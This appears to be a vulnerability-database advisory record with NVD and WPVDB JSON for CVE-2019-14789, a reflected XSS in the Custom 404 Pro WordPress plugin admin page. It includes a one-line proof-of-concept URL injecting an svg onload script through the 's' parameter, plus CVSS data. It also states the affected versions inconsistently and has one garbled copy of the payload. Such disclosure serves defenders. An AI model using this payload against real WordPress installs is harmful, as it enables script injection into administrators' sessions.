ID WPEX-ID:9382
Type wpexploit
Reporter
Modified 2020-09-22T07:28:35
Description
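The Custom 404 Pro WordPress plugin was affected by an authenticated reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2019-14789 (CWE-79). Per the proof of concept below, the `s` parameter of the plugin's admin page (`page=c4p-main`) is reflected into the response, so the injected script runs only in the browser of a logged-in user who has access to that admin page and opens a crafted link. This record states the affected range inconsistently: "<= 3.2.7" in the proof of concept, "3.2.8" in the NVD entry, and "< 3.2.9" in the title. Treat every version before 3.2.9 as affected and upgrade to 3.2.9 or later.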
Version <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s="><svg/onload=alert(/XSS/)>
{"id": "WPEX-ID:9382", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Custom 404 Pro < 3.2.9 - Authenticated Reflected XSS", "description": "The Custom 404 Pro WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.\n", "published": "2019-06-24T00:00:00", "modified": "2020-09-22T07:28:35", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "", "reporter": "", "references": ["https://plugins.trac.wordpress.org/changeset?reponame=&new=2112485%40custom-404-pro&old=2087395%40custom-404-pro"], "cvelist": ["CVE-2019-14789"], "lastseen": "2020-12-09T20:34:20", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-14789"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9382"]}], "modified": "2020-12-09T20:34:20", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-12-09T20:34:20", "rev": 2}, "vulnersScore": 5.2}, "sourceData": "Version <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s=\"><svg/onload=alert(/XSS/)>"}
{"cve": [{"lastseen": "2020-10-03T13:38:44", "description": "The Custom 404 Pro plugin 3.2.8 for WordPress has XSS via the wp-admin/admin.php?page=c4p-main page parameter.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-08-15T16:15:00", "title": "CVE-2019-14789", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14789"], "modified": "2019-08-20T18:45:00", "cpe": ["cpe:/a:custom_404_pro_project:custom_404_pro:3.2.8"], "id": "CVE-2019-14789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14789", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:custom_404_pro_project:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:*"]}], "wpvulndb": [{"lastseen": "2020-12-09T20:34:20", "bulletinFamily": "software", "cvelist": ["CVE-2019-14789"], "description": "The Custom 404 Pro WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.\n\n### PoC\n\nVersion <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s;=\">\n", "modified": "2020-09-22T07:28:35", "published": "2019-06-24T00:00:00", "id": 
"WPVDB-ID:9382", "href": "https://wpvulndb.com/vulnerabilities/9382", "type": "wpvulndb", "title": "Custom 404 Pro < 3.2.9 - Authenticated Reflected XSS", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}